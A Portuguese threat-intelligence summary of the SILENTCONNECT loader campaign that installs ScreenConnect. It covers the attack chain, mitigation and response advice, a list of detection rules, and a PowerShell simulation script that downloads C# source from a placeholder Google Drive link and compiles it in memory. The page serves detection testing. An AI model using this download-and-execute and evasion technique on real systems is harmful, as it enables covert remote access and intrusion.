Seguir 
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O relatório descreve um carregador multiestágio chamado SILENTCONNECT que depende de um dropper VBScript, compilação em memória de código C# no PowerShell e mascaramento de PEB para implantar silenciosamente a ferramenta de gerenciamento remoto ConnectWise ScreenConnect. O ataque começa com um e-mail de phishing que leva as vítimas a uma página CAPTCHA do Cloudflare Turnstile antes de servir a carga útil do VBScript. Esse script recupera um componente C# do Google Drive, compila-o em memória e, em seguida, baixa um MSI do ScreenConnect de um domínio malicioso para estabelecer persistência como um serviço do Windows. A campanha mistura serviços de hospedagem confiáveis com binários de vida própria para reduzir a pegada de detecção.
Investigação
Os Elastic Security Labs identificaram uma cadeia de alertas incomuns de script do Windows que, por fim, expuseram o arquivo E-INVITE.vbs hospedado no Cloudflare R2. A análise mostrou o script lançando um comando PowerShell que chamou o curl.exe para buscar um arquivo fonte C# do Google Drive, que foi então compilado e executado diretamente em memória. O carregador usou NtAllocateVirtualMemory para reservar memória executável, aplicou mascaramento de PEB e inseriu uma exclusão do Windows Defender antes de baixar o instalador do ScreenConnect com curl e executá-lo através do msiexec. A telemetria de rede revelou que o cliente implantado chegou a um endpoint C2 em bumptobabeco.top sobre a porta TCP 8041.
Mitigação
As equipes de segurança devem monitorar linhas de comando do PowerShell suspeitas que invoquem curl.exe, criação de pastas temporárias em C:Temp e compilação Add-Type incomum de código fonte C# baixado. A lógica de detecção deve também considerar o mascaramento de PEB sinalizando processos cujos valores de BaseDLLName ou FullDllName não coincidem com o caminho real do módulo. O tráfego de saída para domínios desconhecidos que hospedam instaladores MSI deve ser bloqueado ou fortemente examinado, e a execução do msiexec deve ser estritamente controlada para fontes não confiáveis. As exclusões do Windows Defender devem ser aplicadas apenas através de fluxos de trabalho administrativos aprovados.
Resposta
Se esses indicadores forem observados, isole imediatamente o host afetado, mate o processo malicioso e remova o serviço ScreenConnect instalado. Colete evidências forenses, incluindo arquivos temporários, o assembly .NET compilado e quaisquer pacotes MSI baixados. Reverta quaisquer exclusões não autorizadas do Windows Defender e restaure as configurações de UAC se elas tiverem sido alteradas. Em seguida, faça a caça em todo o ambiente para artefatos de carregador correspondentes e atualize o conteúdo de detecção com todos os IOCs recém-identificados.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ccffcc classDef malware fill:#ffdddd %% Nodes action_phishing["<b>Ação</b> – <b>Técnica</b>: T1566 Phishing<br/><b>Descrição</b>: E-mail de spearphishing entrega conteúdo malicioso."] class action_phishing action action_user_click["<b>Ação</b> – Usuário clica em link malicioso para página Cloudflare Turnstile."] class action_user_click action malware_vbscript["<b>Malware</b> – Arquivo VBScript<br/><b>Técnica</b>: T1059.005 Visual Basic<br/><b>Descrição</b>: Executa script Visual Basic para lançar mais código."] class malware_vbscript malware tool_powershell["<b>Ferramenta</b> – PowerShell<br/><b>Técnica</b>: T1059.001 PowerShell<br/><b>Descrição</b>: Executa comandos PowerShell para controle do sistema."] class tool_powershell tool tool_curl["<b>Ferramenta</b> – Curl<br/><b>Técnica</b>: T1570 Transferência Lateral de Ferramentas<br/><b>Descrição</b>: Recupera arquivos de armazenamento remoto (Google Drive)."] class tool_curl tool malware_compile["<b>Malware</b> – Compilação C# em memória<br/><b>Técnica</b>: T1027.004 Compilação Após Entrega<br/><b>Descrição</b>: Compila código fonte C# diretamente em memória."] class malware_compile malware process_injection["<b>Processo</b> – NtAllocateVirtualMemory<br/><b>Técnica</b>: T1055.002 Injeção de Processo<br/><b>Descrição</b>: Aloca memória em um processo alvo para injeção de carga útil."] class process_injection process malware_peb["<b>Malware</b> – Mascaramento de PEB<br/><b>Técnica</b>: T1036.011 Mascaramento<br/><b>Descrição</b>: Sobrescreve BaseDLLName para parecer como winhlp32.exe."] class malware_peb malware tool_cmstp["<b>Ferramenta</b> – CMSTP<br/><b>Técnica</b>: T1218.003 Execução de Proxy de Binário do Sistema CMSTP<br/><b>Descrição</b>: Usa a interface COM do CMSTP para contornar o UAC."] class tool_cmstp tool action_defender_exclusion["<b>Ação</b> – <b>Técnica</b>: T1564.012 Exclusões de Caminho de Arquivo<br/><b>Descrição</b>: Adiciona exclusão do Microsoft Defender para executável malicioso."] class action_defender_exclusion action tool_screenconnect_msi["<b>Ferramenta</b> – ScreenConnect MSI<br/><b>Técnica</b>: T1570 Transferência Lateral de Ferramentas<br/><b>Descrição</b>: Baixa instalador de administração remota."] class tool_screenconnect_msi tool tool_msiexec["<b>Ferramenta</b> – Msiexec<br/><b>Técnica</b>: T1547.010 Execução de Autostart de Logon de Boot Monitores de Porta<br/><b>Descrição</b>: Realiza instalação silenciosa do serviço ScreenConnect."] class tool_msiexec tool malware_screenconnect["<b>Malware</b> – Serviço ScreenConnect<br/><b>Técnica</b>: T1219 Ferramentas de Acesso Remoto<br/><b>Descrição</b>: Persiste no sistema e conecta-se a comando e controle."] class malware_screenconnect malware %% Connections action_phishing –>|conduz a| action_user_click action_user_click –>|baixa| malware_vbscript malware_vbscript –>|lança| tool_powershell tool_powershell –>|usa| tool_curl tool_curl –>|busca fonte para| malware_compile malware_compile –>|carrega em| process_injection process_injection –>|habilita| malware_peb malware_peb –>|habilita| tool_cmstp tool_cmstp –>|dispara| action_defender_exclusion action_defender_exclusion –>|baixa| tool_screenconnect_msi tool_screenconnect_msi –>|instala via| tool_msiexec tool_msiexec –>|cria| malware_screenconnect "
Fluxo de Ataque
Detecções
Possível Phishing do Google Drive (via proxy)
Ver
Possível Infiltração / Exfiltração de Dados / C2 via Serviços / Ferramentas de Terceiros (via DNS)
Ver
Possível Script Powershell Contendo Lolbin (via PowerShell)
Ver
Possível Cadeia LOLBAS (via cmdline)
Ver
Msiexec Executado por Processo Shell (via cmdline)
Ver
Possível Acesso Inicial por Phishing com Extensões de Arquivo como TLD (via DNS)
Ver
Possível Atividade de Comando e Controle por Tentativa de Comunicação de Domínio de Software de Acesso Remoto (via DNS)
Ver
Domínio do Google Drive Resolvido por Processo Suspeito (via consulta DNS)
Ver
Comando e Controle Suspeito por Solicitação DNS de Domínio de Nível Superior (TLD) Incomum (via DNS)
Ver
Uso Suspeito de CURL (via cmdline)
Ver
Possível Msiexec Executando Arquivos em Diretório Incomum (via cmdline)
Ver
IOCs (HashSha256) para detectar: Da Convite à Infecção: Como SILENTCONNECT Entrega ScreenConnect
Ver
IOCs (Emails) para detectar: Da Convite à Infecção: Como SILENTCONNECT Entrega ScreenConnect
Ver
IOCs (SourceIP) para detectar: Da Convite à Infecção: Como SILENTCONNECT Entrega ScreenConnect
Ver
IOCs (DestinationIP) para detectar: Da Convite à Infecção: Como SILENTCONNECT Entrega ScreenConnect
Ver
Execução Suspeita do PowerShell com Download e Execução de C# Payload [Windows PowerShell]
Ver
Detecção de Download e Execução do Instalador SILENTCONNECT ScreenConnect [Criação de Processo do Windows]
Ver
Execução de Simulação
Pré-requisito: O Cheque Pré-voo de Telemetria & Linha de Base deve ter passado.
Justificativa: Esta seção detalha a execução precisa da técnica do adversário (TTP) projetada para acionar a regra de detecção. Os comandos e a narrativa DEVEM refletir diretamente os TTPs identificados e visar gerar a telemetria exata esperada pela lógica de detecção. Exemplos abstratos ou não relacionados levarão a diagnósticos errados.
-
Narrativa de Ataque & Comandos:
- Recon Inicial & Recuperação de Payload – O atacante hospeda um arquivo fonte C# malicioso no Google Drive. Usando PowerShell, eles baixam o arquivo bruto via
Invoke-WebRequest. - Compilação em Memória – O código fonte C# baixado é compilado diretamente em memória com
Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $src. - Execução – O tipo .NET resultante é instanciado e seu
Run()método é invocado, estabelecendo um shell reverso. - Ofuscação – A linha de comando é lançada com
-ExecutionPolicy Bypasspara evitar bloqueios de política, correspondendo exatamente às strings que a regra monitora.
- Recon Inicial & Recuperação de Payload – O atacante hospeda um arquivo fonte C# malicioso no Google Drive. Usando PowerShell, eles baixam o arquivo bruto via
-
Script de Teste de Regressão:
# ------------------------------------------------- # Script de adversário simulado – aciona a regra Sigma # ------------------------------------------------- # 1. Defina o URL de payload C# remoto (link de compartilhamento do Google Drive) $payloadUrl = "https://drive.google.com/uc?export=download&id=YOUR_FILE_ID" # 2. Baixe a fonte C# para uma variável $csharpSource = Invoke-WebRequest -Uri $payloadUrl -UseBasicParsing | Select-Object -ExpandProperty Content # 3. Compile e carregue o payload em memória Add-Type -ReferencedAssemblies 'Microsoft.CSharp' -TypeDefinition $csharpSource -Language CSharp # 4. Execute o payload (assume classe chamada "Payload" com método estático "Run") # ------------------------------------------------- -
Comandos de Limpeza:
# Remova quaisquer arquivos temporários (nenhum criado) e descarregue o assembly em memória # PowerShell não fornece um descarregamento direto; termine o processo se necessário Stop-Process -Id $PID -Force